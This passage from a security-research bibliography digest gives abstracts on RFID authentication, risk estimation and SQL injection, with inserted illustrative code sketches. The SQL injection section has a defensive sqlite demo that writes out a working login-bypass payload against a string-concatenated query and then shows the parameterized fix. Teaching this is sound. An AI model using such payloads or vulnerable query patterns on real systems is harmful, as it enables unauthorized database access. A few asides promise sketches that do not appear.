and resists a number of attacks, including replay and desynchronization attacks. We implement our protocol and compare several parameters with existing work; the evaluation results indicate that our protocol significantly improves system performance. Keywords: Authentication, Mobile RFID systems, Privacy-preserving, Ultralightweight
  • Farzana Rahman, Sheikh Iqbal Ahamed, "Efficient Detection Of Counterfeit Products In Large-Scale RFID Systems Using Batch Authentication Protocols," Personal and Ubiquitous Computing, Volume 18 Issue 1, January 2014, (Pages 177-188). (ID#:14-1770) Available at: http://dl.acm.org/citation.cfm?id=2581638.2581671&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1007/s00779-012-0629-8 RFID technology facilitates processing of product information, making it a promising technology for anti-counterfeiting. However, in large-scale RFID applications, such as supply chain, retail industry, and pharmaceutical industry, total tag estimation and tag authentication are two major research issues. Though there are per-tag authentication protocols and probabilistic approaches for total tag estimation in RFID systems, the RFID authentication protocols are mainly per-tag-based, where the reader authenticates one tag at a time. For a batch of tags, current RFID systems have to identify them and then authenticate each tag sequentially, one at a time. This increases the protocol execution time due to the large volume of authentication data. In this paper, we propose to detect counterfeit tags in large-scale systems using an efficient batch authentication protocol. We propose an FSA-based protocol, FTest, to meet the requirements of prompt and reliable batch authentication in large-scale RFID applications. FTest can determine the validity of a batch of tags with minimal execution time, which is a major goal of large-scale RFID systems. FTest can reduce protocol execution time by ensuring that the percentage of potential counterfeit products is under the user-defined threshold. The experimental result demonstrates that FTest performs significantly better than existing counterfeit detection approaches, for example, existing authentication techniques. Keywords: Anti-counterfeiting, Batch authentication, RFID, Security, Supply chain, Tree-based protocols
  • Shuai-Min Chen, Mu-En Wu, Hung-Min Sun, King-Hang Wang, "CRFID: An RFID System With A Cloud Database As A Back-End Server," Future Generation Computer Systems, Volume 30, January, 2014, (Pages 155-161). (ID#:14-1771) Available at: http://dx.doi.org/10.1016/j.future.2013.05.004 Radio-frequency identification (RFID) systems can benefit from cloud databases since information on thousands of tags is queried at the same time. If all RFID readers in a system query a cloud database, data consistency can easily be maintained by cloud computing. Privacy-preserving authentication (PPA) has been proposed to protect RFID security. The time complexity for searching a cloud database in an RFID system is O(N), which is obviously inefficient. Fortunately, PPA uses tree structures to manage tags, which can reduce the complexity from a linear search to a logarithmic search. Hence, tree-based PPA provides RFID scalability. However, in tree-based mechanisms, compromise of a tag may cause other tags in the system to be vulnerable to tracking attacks. Here we propose a secure and efficient privacy-preserving RFID authentication protocol that uses a cloud database as an RFID server. The proposed protocol not only withstands desynchronizing and tracking attacks, but also provides scalability with O(logN) search complexity. (A sketch of the logarithmic tree search follows this list.) Keywords: Cloud computing, Cryptography, Desynchronizing attack, Privacy, RFID, Remote accessibility, Security, Tracking attack
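Several of the mechanisms cited above lend themselves to short sketches. The Urien and Piramuthu entry combines distance bounding with an ambient-temperature check; the hypothetical verifier below (not the authors' protocol) times single-bit challenge-response rounds, rejects a prover whose worst-case round trip implies it is beyond an allowed distance, and additionally requires the two temperature readings to agree. All bounds and tolerances are invented for the illustration.

    import secrets, time

    C = 3e8                          # speed of light, m/s
    MAX_DISTANCE = 2.0               # accept provers within 2 m (illustrative)
    PROCESSING_SLACK = 1e-6          # allowance for tag processing time (assumed)

    def worst_round_trip(prover, n_rounds=32):
        worst = 0.0
        for _ in range(n_rounds):
            challenge = secrets.randbits(1)
            t0 = time.perf_counter()
            prover(challenge)                    # single-bit response
            worst = max(worst, time.perf_counter() - t0)
        return worst

    def verify(prover, temp_at_verifier, temp_reported_by_prover, tol=0.5):
        # A relay adds propagation delay it cannot hide, so the RTT bound fails;
        # a remote prover also cannot know the local surface temperature.
        rtt_ok = worst_round_trip(prover) <= 2 * MAX_DISTANCE / C + PROCESSING_SLACK
        temp_ok = abs(temp_at_verifier - temp_reported_by_prover) <= tol
        return rtt_ok and temp_ok
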
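The Vahedi et al. comparison takes dynamic framed slotted ALOHA as its baseline; the Monte Carlo sketch below shows the mechanics. Tags pick random slots in a frame, singleton slots yield identifications, and the next frame size is re-estimated from the collided slots using the common ~2.39 tags-per-collision heuristic rather than the exact EPC Gen-2 Q algorithm.

    import random

    def identify_all(n_tags, first_frame=16, seed=0):
        random.seed(seed)
        remaining, frame, slots_used, frames = n_tags, first_frame, 0, 0
        while remaining > 0:
            counts = {}
            for _ in range(remaining):
                s = random.randrange(frame)
                counts[s] = counts.get(s, 0) + 1
            singletons = sum(1 for c in counts.values() if c == 1)
            collided = sum(1 for c in counts.values() if c > 1)
            remaining -= singletons                  # singleton slots identify a tag
            slots_used += frame
            frames += 1
            frame = max(4, round(2.39 * collided))   # re-estimate the backlog
        return frames, slots_used

    print(identify_all(200))    # (frames needed, total slots consumed)
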
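For the Measel et al. entry, the benefit of spread-spectrum signatures can be illustrated without generating true Gold or Kasami codes: give each tag a random ±1 signature, superpose the responses of the tags actually present, and declare a tag present when its normalized correlation with the received sum crosses a threshold. The sizes, noise level, and threshold are arbitrary choices for the demo.

    import numpy as np

    rng = np.random.default_rng(7)
    n_tags, L = 20, 127                         # population, signature length
    signatures = rng.choice([-1.0, 1.0], size=(n_tags, L))

    present = {1, 4, 9, 16}                     # tags actually in the field
    received = signatures[sorted(present)].sum(axis=0)
    received += 0.5 * rng.standard_normal(L)    # channel noise

    scores = signatures @ received / L          # normalized correlations
    detected = {i for i, s in enumerate(scores) if s > 0.5}
    print(sorted(detected), "expected:", sorted(present))
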
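The O(logN) lookup that tree-based privacy-preserving authentication provides, the property the CRFID paper builds on, can also be sketched. Tags hold the keys along their root-to-leaf path in a binary key tree; the server descends one level at a time, testing two candidate keys per level instead of all N tag keys. The HMAC construction and tree depth below are illustrative assumptions, not the paper's exact protocol.

    import hashlib, hmac, os

    DEPTH = 10                                   # key tree supports 2**10 tags

    node_keys = {}                               # server's key per path prefix
    def key(prefix):
        if prefix not in node_keys:
            node_keys[prefix] = os.urandom(16)
        return node_keys[prefix]

    def tag_response(leaf_path, nonce):
        # The tag answers with one MAC per tree level, using its path keys.
        return [hmac.new(key(leaf_path[:i + 1]), nonce, hashlib.sha256).digest()
                for i in range(DEPTH)]

    def server_identify(response, nonce):
        # Descend the tree: two trial MACs per level -> O(log N) total work.
        path = ""
        for mac in response:
            for bit in "01":
                trial = hmac.new(key(path + bit), nonce, hashlib.sha256).digest()
                if hmac.compare_digest(trial, mac):
                    path += bit
                    break
            else:
                return None                      # no branch matched: reject
        return path                              # identified leaf, i.e., the tag

    nonce = os.urandom(8)
    print(server_identify(tag_response("0110010111", nonce), nonce))
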

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Risk Estimations

Risk Estimations


Cybersecurity is often a balancing act between risk and cost. Every security solution adds a cost in terms of efficiency or effectiveness, if not of money. Identifying ways to make risk assessment consistent and accurate is the goal of the seven articles cited here. The first paper was presented at HotSoS 2014, the Symposium and Bootcamp on the Science of Security, held April 8-9, 2014, in Raleigh, North Carolina.

  • Qian Liu, Juhee Bae, Benjamin Watson, Anne McLaughlin, William Enck. "Modeling and Sensing Risky User Behavior on Mobile Devices" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) (ID#:14-1416) Temporarily available at: http://www.hot-sos.org/2014/proceedings/papers.pdf As mobile technology begins to dominate computing, understanding how its use impacts security becomes increasingly important. Fortunately, this challenge is also an opportunity: the rich set of sensors with which most mobile devices are equipped provides a rich contextual dataset, one that should enable mobile user behavior to be modeled well enough to predict when users are likely to act insecurely, and to provide cognitively grounded explanations of those behaviors. We will evaluate this hypothesis with a series of experiments designed first to confirm that mobile sensor data can reliably predict user stress, and that users experiencing such stress are more likely to act insecurely. Keywords: Security, user behavior, mobile, risk estimation
  • Haisjackl, C.; Felderer, M.; Breu, R., "RisCal -- A Risk Estimation Tool for Software Engineering Purposes," Software Engineering and Advanced Applications (SEAA), 2013 39th EUROMICRO Conference on, vol., no., pp.292,299, 4-6 Sept. 2013. (ID#:14-1417) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6619524&isnumber=6619471 Decision making in software engineering requires the consideration of risk information. The reliability of risk information is strongly influenced by the underlying risk estimation process, which consists of the steps of risk identification, risk analysis, and risk prioritization. In this paper we present a novel risk estimation tool for software engineering purposes called RisCal. RisCal is based on a generic risk model and supports the integration of manually and automatically determined metrics into the risk estimation. This makes the tool applicable to arbitrary software engineering activities such as risk-based testing or release planning. We show how RisCal supports risk identification, analysis, and prioritization, provide an estimation example, and discuss its application to risk-based testing and release planning. (A minimal probability-times-impact prioritization example follows this list.) Keywords: decision making; program testing; risk analysis; software metrics; RisCal; automatically determined metrics; decision making; generic risk model; manually determined metrics; release planning; risk analysis; risk estimation process; risk estimation tool; risk identification; risk information; risk prioritization; risk-based testing; software engineering activities; software engineering purposes; Estimation; Measurement; Planning; Risk management; Software engineering; Testing; Release Planning; Risk Estimation; Risk-based Testing; Software Risk Management; Test Management
  • Ramler, R.; Felderer, M., "Experiences from an Initial Study on Risk Probability Estimation Based on Expert Opinion," Software Measurement and the 2013 Eighth International Conference on Software Process and Product Measurement (IWSM-MENSURA), 2013 Joint Conference of the 23rd International Workshop on, vol., no., pp.93,97, 23-26 Oct. 2013. (ID#:14-1418) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6693227&isnumber=6693201 Determining the factor probability in risk estimation requires detailed knowledge about the software product and the development process. Basing estimates on expert opinion may be a viable approach if no other data is available. Objective: In this paper we analyze initial results from estimating the risk probability based on expert opinion to answer the questions (1) Are expert opinions consistent? (2) Do expert opinions reflect the actual situation? (3) How can the results be improved? Approach: An industry project serves as the case for our study. In this project six members provided initial risk estimates for the components of a software system. The resulting estimates are compared to each other to reveal the agreement between experts, and they are compared to the actual risk probabilities derived in an ex-post analysis from the released version. Results: We found a moderate agreement between the ratings of the individual experts. We found significant accuracy when compared to the risk probabilities computed from the actual defects. We identified a number of lessons learned useful for improving the simple initial estimation approach applied in the studied project. Conclusions: Risk estimates have successfully been derived from subjective expert opinions. However, additional measures should be applied to triangulate and improve expert estimates. Keywords: probability; risk analysis; software product lines; expert opinion; factor probability; product development process; risk probability estimation; software product; software system; Business; Estimation; Interviews; Software measurement; Software quality; Testing; expert opinion elicitation; risk estimation; risk probability; software risk measurement
  • Krishnan, S.R.; Seelamantula, C.S.; Chakravarti, P., "Spatially Adaptive Kernel Regression Using Risk Estimation," Signal Processing Letters, IEEE, vol.21, no.4, pp.445,448, April 2014. (ID#:14-1419) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6734684&isnumber=6732989 An important question in kernel regression is one of estimating the order and bandwidth parameters from available noisy data. We propose to solve the problem within a risk estimation framework. Considering an independent and identically distributed (i.i.d.) Gaussian observations model, we use Stein's unbiased risk estimator (SURE) to estimate a weighted mean-square error (MSE) risk, and optimize it with respect to the order and bandwidth parameters. The two parameters are thus spatially adapted in such a manner that noise smoothing and fine structure preservation are simultaneously achieved. On the application side, we consider the problem of image restoration from uniform/non-uniform data, and show that the SURE approach to spatially adaptive kernel regression results in better quality estimation compared with its spatially non-adaptive counterparts. The denoising results obtained are comparable to those obtained using other state-of-the-art techniques, and in some scenarios, superior. (The SURE formula is reproduced after this list.) Keywords: Gaussian processes; image denoising; image restoration; mean square error methods; regression analysis; Gaussian observations model; SURE; Stein unbiased risk estimator; fine structure preservation; image denoising; image restoration; noise smoothing; quality estimation; risk estimation; spatially adaptive kernel regression; weighted mean-square error; Bandwidth; Cost function; Estimation; Kernel; Noise measurement; Signal processing algorithms; Smoothing methods; Denoising; Stein's unbiased risk estimator (SURE); nonparametric regression; spatially adaptive kernel regression
  • Babuscia, A., Kar-Ming Cheung, "Statistical Risk Estimation for Communication System Design," Systems Journal, IEEE, vol.7, no.1, pp.125,136, March 2013. (ID#:14-1420) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6264116&isnumber=6466438 Spacecraft are complex systems that involve different subsystems and multiple relationships among them. For these reasons, the design of a spacecraft is an evolutionary process that starts from requirements and evolves over time across different design phases. During this process, a lot of changes can happen. They can affect mass and power at component, subsystem, and system levels. Each spacecraft has to respect the overall constraints in terms of mass and power: for this reason, it is important to be sure that the design does not exceed these limitations. Current practice in the system model primarily deals with this problem by allocating margins on individual components and on individual subsystems. However, a statistical characterization of the fluctuations in mass and power of the overall system (i.e., the spacecraft) is missing. This lack of an adequate statistical characterization would result in a risky spacecraft design that might not fit the mission constraints and requirements, or in a conservative design that might not fully utilize the available resources. Due to the complexity of the problem and due to the different expertise and knowledge required to develop a complete risk model for a spacecraft design, this research is focused on risk estimation for a specific spacecraft subsystem, the communication subsystem. The current research aims to be a "proof of concept" of a risk-based design optimization approach, which can then be further expanded to the design of other subsystems as well as to the whole spacecraft. The objective of this paper is to develop a mathematical approach to quantify the likelihood that the major design drivers of mass and power of a space communication system would meet the spacecraft and mission requirements and constraints through the mission design lifecycle. Using this approach the communication system designers will be able to evaluate and compare different communication architectures in a risk tradeoff perspective. The results described here include a baseline communication system design tool and a statistical characterization of the design risks through a combination of historical mission data and expert opinion contributions. An application example of the communication system of a university spacecraft is presented. Keywords: mathematical analysis; optimization; risk analysis; space communication links; space vehicles; statistical analysis; communication subsystem; communication system design; communication system designers; design phases; evolutionary process; historical mission data; mathematical approach; risk model; risk tradeoff perspective; risk-based design optimization approach; space communication system; spacecraft design; spacecraft subsystem; statistical characterization; statistical risk estimation; system model; university spacecraft; Antennas; Communication systems; Computational modeling; Data models; Databases; Estimation; Space vehicles; Biases; communication system; density estimation; design risk; expert elicitation; heuristics; risk analysis
  • Moussa Ouedraogo, Manel Khodja, Djamel Khadraoui, "Towards a Risk Based Assessment of QoS Degradation for Critical Infrastructure" Proceedings of the 2013 International Conference on Availability, Reliability and Security, September 2013. (Pages 538-545) (ID#:14-1421) Available at: http://dl.acm.org/citation.cfm?id=2545118.2545245&coll=DL&dl=GUIDE&CFID=449793911&CFTOKEN=46643839 or http://dx.doi.org/10.1109/ARES.2013.71 In this paper, we first present an attack-graph based estimation of security risk and its aggregation from lower-level components to an entire service. We then present an initiative towards appreciating how the quality of service (QoS) parameters of a service may be affected as a result of fluctuations in the cyber security risk level. Because the service provided by critical infrastructure is often vital, providing an approach that enables the operator to foresee any QoS degradation as a result of a security event is paramount. We provide an illustration of the risk estimation approach along with a description of an initial prototype developed using a multi-agent platform. (A toy attack-graph risk aggregation follows this list.) Keywords: Critical infrastructure, Vulnerabilities, Risk, Quality of Service
  • Severien Nkurunziza, Fuqi Chen, "On extension of some identities for the bias and risk functions in elliptically contoured distributions," Journal of Multivariate Analysis, Volume 122, November, 2013 (Pages 190-201). (ID#:14-1422) Available at: http://dl.acm.org/citation.cfm?id=2532872.2532997&coll=DL&dl=GUIDE&CFID=449793911&CFTOKEN=46643839 or http://dx.doi.org/10.1016/j.jmva.2013.07.005 In this paper, we are interested in an estimation problem concerning the mean parameter of a random matrix whose distribution is elliptically contoured. We derive two general formulas for the bias and risk functions of a class of multidimensional shrinkage-type estimators. As a by-product, we generalize some recent identities established in Gaussian sample cases for which the shrinking random part is a single Kronecker-product. Here, the variance-covariance matrix of the shrinking random part is the sum of two Kronecker-products. Keywords: 62F25, 62H12, Bias function, Elliptically contoured distribution, Kronecker-product, Matrix estimation, Risk function, Stein rules
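At its simplest, the identification-analysis-prioritization pipeline that tools such as RisCal support reduces to scoring each item by probability times impact and sorting. The register below is entirely made up, purely to show the shape of the computation.

    # Illustrative risk register: component -> (failure probability, impact 1-10).
    risks = {
        "payment-service":  (0.30, 9),
        "report-generator": (0.60, 3),
        "login-module":     (0.15, 8),
        "audit-logger":     (0.40, 5),
    }

    # Risk exposure = probability x impact; address the riskiest items first.
    exposure = {name: p * impact for name, (p, impact) in risks.items()}
    for name, score in sorted(exposure.items(), key=lambda kv: -kv[1]):
        print(f"{name:18s} exposure = {score:.2f}")
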
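For readers unfamiliar with the estimator behind the Krishnan et al. paper: given observations y = f + epsilon with Gaussian noise of variance sigma^2 and a weakly differentiable estimate h(y) of f, Stein's unbiased risk estimate depends only on the observed data,

    \mathrm{SURE}(h) \;=\; \lVert h(y) - y \rVert^2 \;-\; n\sigma^2
        \;+\; 2\sigma^2 \sum_{k=1}^{n} \frac{\partial h_k(y)}{\partial y_k},
    \qquad
    \mathbb{E}\!\left[\mathrm{SURE}(h)\right] \;=\; \mathbb{E}\,\lVert h(y) - f \rVert^2,

so minimizing it over the kernel order and bandwidth adapts those parameters spatially without access to the clean signal.
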
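The attack-graph aggregation that the Ouedraogo et al. paper starts from can be sketched as a recursive evaluation over AND nodes (every step must succeed) and OR nodes (any child path suffices), assuming independent success probabilities. The graph and the numbers below are invented for illustration.

    def node_risk(node):
        if "children" not in node:
            return node["p"]                 # leaf: atomic exploit probability
        probs = [node_risk(c) for c in node["children"]]
        if node["type"] == "AND":            # all steps must succeed
            out = 1.0
            for p in probs:
                out *= p
            return out
        out = 1.0                            # OR: at least one path succeeds
        for p in probs:
            out *= 1.0 - p
        return 1.0 - out

    service = {"type": "OR", "children": [
        {"type": "AND", "children": [{"p": 0.4},    # steal credentials
                                     {"p": 0.7}]},  # reach admin console
        {"p": 0.1},                                 # unpatched remote exploit
    ]}
    print(f"aggregate compromise probability: {node_risk(service):.3f}")  # 0.352
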


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.





SQL Injections

SQL Injections


SQL injection is used to attack data-driven applications: malicious SQL statements are inserted into an entry field for execution, for example to dump the database contents to the attacker. One of the most common hacker techniques, SQL injection exploits security vulnerabilities in an application's software. It is mostly used against websites but can be used to attack any type of SQL database. Because of its prevalence and its ease of use from the attacker's perspective, it is an important area for research. The articles cited here focus on prevention, detection, and testing; a short demonstration of the vulnerability and its standard remedy follows.
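In the self-contained sqlite3 example below, the string-concatenated query lets the classic ' OR '1'='1 payload bypass a password check, while the parameterized version treats the same payload as inert data. The table and values are invented for the demo.

    import sqlite3

    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")

    payload = "' OR '1'='1"

    # Vulnerable: attacker-controlled text is spliced into the statement.
    q = ("SELECT * FROM users WHERE name = '" + payload +
         "' AND pw = '" + payload + "'")
    print(db.execute(q).fetchall())     # [('alice', 's3cret')] -- check bypassed

    # Safe: placeholders keep the payload as a literal value, never as SQL.
    q = "SELECT * FROM users WHERE name = ? AND pw = ?"
    print(db.execute(q, (payload, payload)).fetchall())   # [] -- attack inert
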

  • Srivastava, Mahima, "Algorithm to Prevent Back End Database Against SQL Injection Attacks," Computing for Sustainable Global Development (INDIA Com), 2014 International Conference on, vol., no., pp.754,757, 5-7 March 2014. (ID#:14-1797) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828063&isnumber=6827395 SQL injection attack (SQLIA) is a technique through which attackers gain access to back-end databases by inserting malicious code through the front-end. In recent times SQL injection attacks (SQLIAs) have emerged as a major threat to database security. Flaws in design, improper coding practices, configuration errors, improper validation of user input, etc. make web applications vulnerable and allow malicious users to obtain unrestricted access to confidential information. Researchers have proposed many solutions, but SQLIAs persist. In this paper we discuss several types of SQLIAs, existing techniques, and their drawbacks. Finally, a solution using ASCII values is proposed and implemented in C# with SQL Server 2005, although the algorithm can be implemented in any language and for any database platform with minimal modifications. Keywords: Arrays; Authentication; Databases; Encoding; Internet; Servers; ASCII values; SQL injections; SQL query; cyber crime; run time monitoring
  • Khanuja, H.; Suratkar, S.S., "Role of Metadata in Forensic Analysis of Database Attacks," Advance Computing Conference (IACC), 2014 IEEE International, vol., no., pp.457,462, 21-22 Feb. 2014. (ID#:14-1798) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779367&isnumber=6779283 With the spectacular increase in online activities like e-transactions, security and privacy issues are at the peak with respect to their significance. Large numbers of database security breaches are occurring at a very high rate on a daily basis. So, there is a crucial need in the field of database forensics to make several redundant copies of sensitive data found in database server artifacts, audit logs, cache, table storage, etc. for analysis purposes. A large volume of metadata is available in the database infrastructure for investigation purposes, but most of the effort lies in the retrieval and analysis of that information from computing systems. Thus, in this paper we mainly focus on the significance of metadata in database forensics. We propose a system to perform forensic analysis of a database by generating its metadata file independent of the DBMS system used. We also aim to generate digital evidence against criminals for presentation in a court of law in the form of who, when, why, what, how and where the fraudulent transaction occurred. Thus, we present a system to detect major database attacks as well as anti-forensics attacks by developing an open source database forensics tool. Eventually, we point out the challenges in the field of forensics and how these challenges can be used as opportunities to stimulate the areas of database forensics. Keywords: data privacy; digital forensics; law; metadata; anti-forensics attacks; audit logs; cache; court of law; database attacks; database security breaches; database server artifacts; digital evidence; e-transactions; forensic analysis; fraudulent transaction information analysis; information retrieval; metadata; online activities; open source database forensics tool; privacy issue; security issue; table storage; Conferences; Handheld computers; Database forensics; SQL injection; anti-forensics attacks; digital notarization; linked hash technique; metadata; reconnaissance attack; trail obfuscation
  • Antunes, N.; Vieira, M., "Penetration Testing for Web Services," Computer , vol.47, no.2, pp.30,36, Feb. 2014. (ID#:14-1799) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6681866&isnumber=6756723 Web services are often deployed with critical software security faults that open them to malicious attack. Penetration testing using commercially available automated tools can help avoid such faults, but new analysis of several popular testing tools reveals significant failings in their performance. The Web extra at http://youtu.be/COgKs9e679o is an audio interview in which authors Nuno Antunes and Marco Vieira describe how their analysis of popular testing tools revealed significant performance failures and provided important insights for future improvement. Keywords: Web services; program testing; safety-critical software; security of data; Web services; commercially available automated tools; critical software security faults; malicious attack; penetration testing; Computer security; Computer viruses; Runtime; Simple object access protocol; Software testing; Web and internet services; SQL injection; Web security scanners; Web services; code vulnerabilities; command injection; penetration testing; vulnerability detection
  • Bozic, Josip; Wotawa, Franz, "Security Testing Based on Attack Patterns," Software Testing, Verification and Validation Workshops (ICSTW), 2014 IEEE Seventh International Conference on, vol., no., pp.4,11, March 31 2014-April 4 2014. (ID#:14-1800) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825631&isnumber=6825623 Testing for security related issues is an important task of growing interest due to the vast amount of applications and services available over the internet. In practice, testing for security is often performed manually, with the consequences of higher costs and no integration of security testing with today's agile software development processes. In order to bring security testing into practice, many different approaches have been suggested, including fuzz testing and model-based testing approaches. Most of these approaches rely on models of the system or the application domain. In this paper we suggest formalizing attack patterns from which test cases can be generated and even executed automatically. Hence, testing for known attacks can be easily integrated into software development processes where automated testing, e.g., for daily builds, is a requirement. The approach makes use of UML state charts. Besides discussing the approach, we illustrate it using a case study. Keywords: Adaptation models; Databases; HTML; Security; Software; Testing; Unified modeling language; Attack pattern; SQL injection; UML state machine; cross-site scripting; model-based testing; security testing
  • Fonseca, Jose; Seixas, Nuno; Vieira, Marco; Madeira, Henrique, "Analysis of Field Data on Web Security Vulnerabilities," Dependable and Secure Computing, IEEE Transactions on , vol.11, no.2, pp.89,100, March-April 2014. (ID#:14-1801) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6589556&isnumber=6785951 Most web applications have critical bugs (faults) affecting their security, which makes them vulnerable to attacks by hackers and organized crime. To prevent these security problems from occurring it is of utmost importance to understand the typical software faults. This paper contributes to this body of knowledge by presenting a field study on two of the most widely spread and critical web application vulnerabilities: SQL Injection and XSS. It analyzes the source code of security patches of widely used web applications written in weak and strong typed languages. Results show that only a small subset of software fault types, affecting a restricted collection of statements, is related to security. To understand how these vulnerabilities are really exploited by hackers, this paper also presents an analysis of the source code of the scripts used to attack them. The outcomes of this study can be used to train software developers and code inspectors in the detection of such faults and are also the foundation for the research of realistic vulnerability and attack injectors that can be used to assess security mechanisms, such as intrusion detection systems, vulnerability scanners, and static code analyzers. Keywords: Awards activities; Blogs; Internet; Java; Security; Software; Internet applications; Security; languages; review and evaluation
  • Hamdi, Mohammed; Safran, Mejdl; Hou, Wen-Chi, "A Security Novel for a Networked Database," Computational Science and Computational Intelligence (CSCI), 2014 International Conference on , vol.1, no., pp.279,284, 10-13 March 2014. (ID#:14-1802) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822122&isnumber=6822065 The security of databases is an important characteristic for database systems. It is intended to protect data from unauthorized access, damage or loss. With the advance of the methods of penetration and piracy, and with the increased reliance on databases that are connected with the Internet, the protection of databases has become one of the challenges faced by various emerging institutions, especially with the increasing of electronic crimes and thefts. In light of this, the focus is on analyzing and reviewing the cryptosystem architecture for networked databases. In this paper, we will discuss the process of encryption and decryption at the application and storage levels. Moreover, strategies of encryption inside the database by using the property of Transparent Data Encryption will be addressed. These methods will give a clear analysis of how data stored in databases can be protected and secured over the network. Additionally, these methods will help to overcome problems that are usually faced by administrative beginners, who work in the enterprises and manage their databases. Finally, we will discuss SQL injection, as a database attack and present the techniques of defense that prevent the adversaries from attacking the database. Keywords: Ciphers; Databases; Encryption; Public key; Servers; Cryptography; Database; SQL; Security
  • Alqahtani, Saeed M.; Balushi, Maqbool Al; John, Robert, "An Intelligent Intrusion Prevention System for Cloud Computing (SIPSCC)," Computational Science and Computational Intelligence (CSCI), 2014 International Conference on , vol.2, no., pp.152,158, 10-13 March 2014. (ID#:14-1803) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822321&isnumber=6822285 Cloud computing is a fast growing IT model for the exchange and delivery of different services through the Internet. However, there is a plethora of security concerns in cloud computing which still need to be tackled (e.g. confidentiality, auditability and Privileged User Access). To detect and prevent such issues, the Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) are effective mechanisms against attacks such as SQL Injection. This study proposes a new IPS service that prevents SQL injections when they come over a cloud computing website (CCW), using a signature-based approach. A model has been implemented on three virtual machines. Through this implementation, a service-based intrusion prevention system in cloud computing (SIPSCC) is proposed, investigated and evaluated from three perspectives: vulnerability detection, average time, and false positives. Keywords: Cloud computing; Databases; Educational institutions; Intrusion detection; Servers; SIPSCC; CCW; IDS; IPS; Open Source Host-based Intrusion Detection System (OSSEC)
  • Al-Sakib Khan Pathan, Diallo Abdoulaye Kindy, "Lethality of SQL Injection Against Current And Future Internet Technologies," International Journal of Computational Science and Engineering, Volume 9 Issue 4, April 2014, (Pages 386-394). (ID#:14-1804) Available at: http://dl.acm.org/citation.cfm?id=2630009.2630019&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1504/IJCSE.2014.060720 SQL injection attack is often used as the underlying technology for hacking, which has made a significant number of news headlines in recent years. A vast majority of readers do not have a clear idea how SQL injection attack is used for hacking. In this article, we analyze this technology from the necessary angles and discuss how this could be a significant potential threat for future web and internet technologies. (A sketch contrasting vulnerable and parameterized queries appears after this list.) Keyword: SQL injection
  • Michael Marcozzi, Wim Vanhoof, Jean-Luc Hainaut, "Towards Testing Of Full-Scale SQL Applications Using Relational Symbolic Execution," CSTVA 2014 Proceedings of the 6th International Workshop on Constraints in Software Testing, Verification, and Analysis, May 2014, (Pages 12-17). (ID#:14-1805) Available at: http://dl.acm.org/citation.cfm?id=2593735.2593738&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1145/2593735.2593738 Constraint-based testing is an automatic test case generation approach where the tested application is transformed into constraints whose solutions are adequate test data. In previous work, we have shown that this technique is particularly well-suited for testing SQL applications, as the semantics of SQL can be naturally transformed into standard SMT constraints, using so-called relational symbolic execution. In particular, we have demonstrated such testing to be possible in practice with current solver techniques for small-scale applications. In this work, we identify the main challenges and provide research directions towards constraint-based testing of full-scale SQL applications. We investigate the additional research work needed to integrate relational and dynamic symbolic execution, handle dynamic SQL properly, generate tractable SMT constraints for most SQL applications, detect SQL runtime errors and deal with non-deterministic SQL. (A toy constraint-solving sketch appears after this list.) Keywords: Databases, Fault localization, Quantifiers, SMT solvers, SQL, Symbolic execution, Test data generation
  • Anton V. Uzunov, Eduardo B. Fernandez, "An Extensible Pattern-Based Library And Taxonomy Of Security Threats For Distributed Systems," Computer Standards & Interfaces, Volume 36 Issue 4, June, 2014, ( Pages 734-747). (ID#:14-1806) Available at: http://dl.acm.org/citation.cfm?id=2588915.2589309&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1016/j.csi.2013.12.008 Security is one of the most essential quality attributes of distributed systems, which often operate over untrusted networks such as the Internet. To incorporate security features during the development of a distributed system requires a sound analysis of potential attacks or threats in various contexts, a process that is often termed ''threat modeling''. To reduce the level of security expertise required, threat modeling can be supported by threat libraries (structured or unstructured lists of threats), which have been found particularly effective in industry scenarios; or attack taxonomies, which offer a classification scheme to help developers find relevant attacks more easily. In this paper we combine the values of threat libraries and taxonomies, and propose an extensible, two-level ''pattern-based taxonomy'' for (general) distributed systems. The taxonomy is based on the novel concept of a threat pattern, which can be customized and instantiated in different architectural contexts to define specific threats to a system. This allows developers to quickly consider a range of relevant threats in various architectural contexts as befits a threat library, increasing the efficacy of, and reducing the expertise required for, threat modeling. The taxonomy aims to classify a wide variety of more abstract, system- and technology-independent threats, which keeps the number of threats requiring consideration manageable, increases the taxonomy's applicability, and makes it both more practical and more useful for security novices and experts alike. After describing the taxonomy which applies to distributed systems generally, we propose a simple and effective method to construct pattern-based threat taxonomies for more specific system types and/or technology contexts by specializing one or more threat patterns. This allows for the creation of a single application-specific taxonomy. We demonstrate our approach to specialization by constructing a threat taxonomy for peer-to-peer systems. Keywords: Distributed systems security attacks, Pattern-based security threat taxonomy, Peer-to-peer 